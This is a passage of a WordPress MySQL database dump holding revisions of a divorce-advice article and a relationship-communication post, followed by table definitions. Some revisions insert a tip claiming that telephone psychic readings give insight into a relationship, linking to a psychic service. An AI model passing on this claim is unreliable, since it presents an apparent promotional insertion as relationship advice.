href=\"../go/divorcedefense/\" target=\"_blank\" rel=\"nofollow noopener\"><em><strong>Women: Getting A Divorce? You Might Want To Read This…</strong></em></a></h3>\r\n<h3>3. Do not move out of the marital home without talking to an attorney first.</h3>\r\nLeaving the house without a good reason may cause you to pay alimony or may result in your inability to collect alimony. If you leave the house, you may also be unable to return until after a court divides the property. This process might take more than a year. The best advice is to stay in the house until after you talk with an attorney unless your spouse is violent. If your spouse is violent, you must take all steps necessary to protect yourself and your children.\r\n<h3>4. If you have been involved in any extramarital affairs, talk to a lawyer before you discuss this with your spouse or anyone else.</h3>\r\nIn this case, honesty may not be the best policy. In addition to the fact that adultery is illegal in some states, admission of an affair can have other dire consequences. If your spouse is a candidate for alimony, any illicit sexual behavior on your part (during the marriage which includes the time you are separated) could end up costing you thousands in additional alimony payments.\r\n<h3>5. Take concrete steps to safeguard your assets before you and your spouse begin discussing divorce.</h3>\r\nOne of these steps is to take possession of certain assets during separation, especially those assets you wish to be using, such as furniture and vehicles, and those assets that might be liquidated by your spouse, including precious gems and stones, other collectibles, cash, and bearer bonds.\r\n\r\nAnother self-protective step is to file what is known as a Lis Pendens in the Deeds Office of any county where you and/or your spouse own real property. The lis pendens puts third parties on notice of your claim to have an interest in the real estate against which the lis pendens is docketed. The lis pendens is basically a notice of pending litigation that may affect real property. A properly recorded and served lis pendens clouds the title to the property, preventing an effective sale of the property behind your back. The rules regarding a lis pendens contain very specific requirements, all of which are spelled out in section 1-116 and the following sections of the North Carolina General Statutes.\r\n\r\nA third possible step to protect the assets of your marriage is to get an injunction restraining your spouse from transferring or otherwise disposing of any property covered by the restraining order. Your attorney can also use an injunction to get your separate property returned to you, where your separate property is in the possession of your spouse and the spouse refuses to give it to you. The equitable distribution statute also provides a means for you to obtain an interim distribution of marital property, pending a final resolution of the property matter. Such an interim allocation could, for instance, give you much needed funds on which to live.\r\n\r\nOther protective measures you might consider in your divorce planning include: (1) protecting your own credit rating by freezing or closing joint cards and by blocking your spouse’s access to other joint credit such as a home equity loan; (2) closing joint bank accounts and opening accounts in your own, individual name; (3) changing the name of the responsible party on utility and other bills; and (4) spending where possible your spouse’s separate property first, marital property next, and your own separate property last.\r\n\r\nWhile this list will help you get started on the right track, it is by no means a complete list of all the things you need to do and know if you are considering a divorce. For more information about the rights and duties of separating and divorcing husbands and wives visit http://www.rosen.com. You’ll find a complete law library, downloadable divorce forms, a legal fee calculator, a child support calculator, lists of professionals who can help you and stories from people just like you who have survived divorce.\r\n\r\nLee S. Rosen is a Board Certified Family Law Specialist and founder of Rosen Divorce in North Carolina. Rosen Divorce is the largest divorce firm in the Southeastern United States. For more information visit <a href=\"http://www.rosen.com/\" target=\"_new\" rel=\"nofollow\">http://www.rosen.com.</a>\r\n<h3><a href=\"/\" target=\"_blank\" rel=\"noopener\"><em><strong>Men: If You Are Getting A Divorce,You Might Want To Read This…</strong></em></a></h3>\r\n</div>\r\n</div>\r\n</div>','5 things to think about when getting a divorce','Thinking about getting a divorce? There are many steps to take before you can start to think about getting a divorce. This article will help you...','inherit','closed','closed','','34-revision-v1','','','2018-11-08 15:10:04','2018-11-08 15:10:04','',34,'http://www.bournesociety.org.uk/34-revision-v1',0,'revision','',0),(364,1,'2019-01-14 11:58:37','2019-01-14 11:58:37','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"></div>\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is “listening from love?”</strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. We think, this is not the case.\r\n\r\nWe agree with author Stephen Covey in his book the 7 Habits of Highly Effective People, when he says we should “seek first to understand , then be understood.”\r\n\r\nListen from love is not judging. It’s listening –truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between\r\nyou.</li>\r\n 	<li>Make a conscious effort to avoid reacting defensively, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 11:58:37','2019-01-14 11:58:37','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(365,1,'2019-01-14 11:59:24','2019-01-14 11:59:24','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"></div>\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is “listening from love?”</strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. We think, this is not the case.\r\n\r\nWe agree with author Stephen Covey in his book the 7 Habits of Highly Effective People, when he says we should “seek first to understand , then be understood.”\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between\r\nyou.</li>\r\n 	<li>Make a conscious effort to avoid reacting defensively, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 11:59:24','2019-01-14 11:59:24','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(366,1,'2019-01-14 11:59:44','2019-01-14 11:59:44','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is “listening from love?”</strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. We think, this is not the case.\r\n\r\nWe agree with author Stephen Covey in his book the 7 Habits of Highly Effective People, when he says we should “seek first to understand , then be understood.”\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between\r\nyou.</li>\r\n 	<li>Make a conscious effort to avoid reacting defensively, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 11:59:44','2019-01-14 11:59:44','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(367,1,'2019-01-14 12:04:47','2019-01-14 12:04:47','<div id=\"content\" class=\"hfeed\">\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\n<div class=\"headline_area\">\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\n</div>\n<div class=\"format_text entry-content\">\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\n\n<em><strong>So, what is <a href=\"https://the20minuteguide.com/parents/helping-with-words/listening/\" target=\"_blank\" rel=\"noopener\">“listening from love?”</a></strong></em>\n\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. <strong>We think, this is not the case</strong>.\n\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart. <a href=\"http://www.bournesociety.org.uk/contact\">Get in touch with us</a>.\n<h2>One common complaint between partners is “you never listen to me.”</h2>\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest. <a href=\"http://www.bournesociety.org.uk/communication-problems-is-silence-really-golden\">How to communicate</a>.\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\n<ul>\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”. <a href=\"https://www.relate.org.uk/relationship-help/help-relationships/communication/4-communication-habits-avoid-your-relationship\" target=\"_blank\" rel=\"noopener\">See habits to avoid</a>.</li>\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between. <a href=\"https://www.psychologytoday.com/gb/blog/evolution-the-self/201009/can-you-and-your-partner-agree-disagree\" target=\"_blank\" rel=\"noopener\">Find out more</a>.\nyou.</li>\n 	<li>Telephone psychic calls can give you an insight to the direction of your relationship. <a href=\"https://www.clairvoyant.co/trusted-telephone-psychic-readings/psychic-preparation\" target=\"_blank\" rel=\"noopener\">Prepare for your reading</a>.</li>\n 	<li>Make a conscious effort to <a href=\"https://www.quickanddirtytips.com/health-fitness/mental-health/how-to-stop-getting-defensive\" target=\"_blank\" rel=\"noopener\">avoid reacting defensively</a>, even in your mind, if this is your pattern.</li>\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\n</ul>\n</div>\n</div>\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-autosave-v1','','','2019-01-14 12:04:47','2019-01-14 12:04:47','',54,'http://www.bournesociety.org.uk/54-autosave-v1',0,'revision','',0),(368,1,'2019-01-14 12:03:06','2019-01-14 12:03:06','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is “listening from love?”</strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. <strong>We think, this is not the case</strong>.\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”. <a href=\"https://www.relate.org.uk/relationship-help/help-relationships/communication/4-communication-habits-avoid-your-relationship\" target=\"_blank\" rel=\"noopener\">See habits to avoid</a>.</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between. <a href=\"https://www.psychologytoday.com/gb/blog/evolution-the-self/201009/can-you-and-your-partner-agree-disagree\" target=\"_blank\" rel=\"noopener\">Find out more</a>.\r\nyou.</li>\r\n 	<li>Telephone psychic calls can give you an insight to the direction of your relationship. <a href=\"https://www.clairvoyant.co/trusted-telephone-psychic-readings/psychic-preparation\" target=\"_blank\" rel=\"noopener\">Prepare for your reading</a>.</li>\r\n 	<li>Make a conscious effort to <a href=\"https://www.quickanddirtytips.com/health-fitness/mental-health/how-to-stop-getting-defensive\" target=\"_blank\" rel=\"noopener\">avoid reacting defensively</a>, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 12:03:06','2019-01-14 12:03:06','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(369,1,'2019-01-14 12:03:43','2019-01-14 12:03:43','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is <a href=\"https://the20minuteguide.com/parents/helping-with-words/listening/\" target=\"_blank\" rel=\"noopener\">“listening from love?”</a></strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. <strong>We think, this is not the case</strong>.\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”. <a href=\"https://www.relate.org.uk/relationship-help/help-relationships/communication/4-communication-habits-avoid-your-relationship\" target=\"_blank\" rel=\"noopener\">See habits to avoid</a>.</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between. <a href=\"https://www.psychologytoday.com/gb/blog/evolution-the-self/201009/can-you-and-your-partner-agree-disagree\" target=\"_blank\" rel=\"noopener\">Find out more</a>.\r\nyou.</li>\r\n 	<li>Telephone psychic calls can give you an insight to the direction of your relationship. <a href=\"https://www.clairvoyant.co/trusted-telephone-psychic-readings/psychic-preparation\" target=\"_blank\" rel=\"noopener\">Prepare for your reading</a>.</li>\r\n 	<li>Make a conscious effort to <a href=\"https://www.quickanddirtytips.com/health-fitness/mental-health/how-to-stop-getting-defensive\" target=\"_blank\" rel=\"noopener\">avoid reacting defensively</a>, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 12:03:43','2019-01-14 12:03:43','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(370,1,'2019-01-14 12:05:23','2019-01-14 12:05:23','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is <a href=\"https://the20minuteguide.com/parents/helping-with-words/listening/\" target=\"_blank\" rel=\"noopener\">“listening from love?”</a></strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. <strong>We think, this is not the case</strong>.\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart. <a href=\"http://www.bournesociety.org.uk/contact\">Get in touch with us</a>.\r\n\r\n<em>Not communicating properly in a relationship can be a cause of the breakdown of your marriage. <a href=\"http://www.bournesociety.org.uk/communication-breakdown-in-a-marriage\">Click here</a>.</em>\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest. <a href=\"http://www.bournesociety.org.uk/communication-problems-is-silence-really-golden\">How to communicate</a>.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”. <a href=\"https://www.relate.org.uk/relationship-help/help-relationships/communication/4-communication-habits-avoid-your-relationship\" target=\"_blank\" rel=\"noopener\">See habits to avoid</a>.</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between. <a href=\"https://www.psychologytoday.com/gb/blog/evolution-the-self/201009/can-you-and-your-partner-agree-disagree\" target=\"_blank\" rel=\"noopener\">Find out more</a>.\r\nyou.</li>\r\n 	<li>Telephone psychic calls can give you an insight to the direction of your relationship. <a href=\"https://www.clairvoyant.co/trusted-telephone-psychic-readings/psychic-preparation\" target=\"_blank\" rel=\"noopener\">Prepare for your reading</a>.</li>\r\n 	<li>Make a conscious effort to <a href=\"https://www.quickanddirtytips.com/health-fitness/mental-health/how-to-stop-getting-defensive\" target=\"_blank\" rel=\"noopener\">avoid reacting defensively</a>, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2019-01-14 12:05:23','2019-01-14 12:05:23','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (18,2,0),(19,2,0),(20,2,0),(21,2,0),(22,2,0),(23,2,0),(24,2,0),(27,1,0),(28,1,0),(29,1,0),(30,1,0),(31,1,0),(32,1,0),(34,1,0),(35,1,0),(36,1,0),(37,1,0),(38,1,0),(39,1,0),(40,1,0),(41,1,0),(42,1,0),(43,1,0),(44,1,0),(45,1,0),(46,1,0),(47,1,0),(48,1,0),(49,1,0),(50,1,0),(51,1,0),(52,1,0),(53,1,0),(54,7,0),(54,9,0),(54,10,0),(55,1,0),(56,1,0),(57,1,0),(58,1,0),(59,1,0),(60,7,0),(60,8,0),(61,1,0),(289,3,0),(290,3,0),(291,3,0),(292,3,0),(293,3,0),(294,3,0),(295,3,0),(296,3,0),(297,3,0),(298,3,0),(299,3,0),(300,3,0),(301,3,0),(302,3,0),(303,3,0),(304,3,0),(305,3,0),(306,3,0),(307,3,0),(308,3,0),(309,3,0),(310,3,0),(311,3,0),(312,3,0),(313,3,0),(314,3,0),(315,3,0),(316,3,0),(317,3,0),(318,3,0),(319,3,0),(320,3,0),(321,3,0),(322,3,0),(327,4,0),(328,4,0),(329,4,0),(330,4,0),(331,4,0),(332,4,0),(333,4,0),(335,2,0),(340,2,0),(343,4,0),(344,4,0),(346,5,0),(346,6,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,32),(2,2,'nav_menu','',0,9),(3,3,'nav_menu','',0,34),(4,4,'nav_menu','',0,9),(5,5,'category','',0,1),(6,6,'category','',0,1),(7,7,'category','',0,2),(8,8,'category','',0,1),(9,9,'category','',0,1),(10,10,'category','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
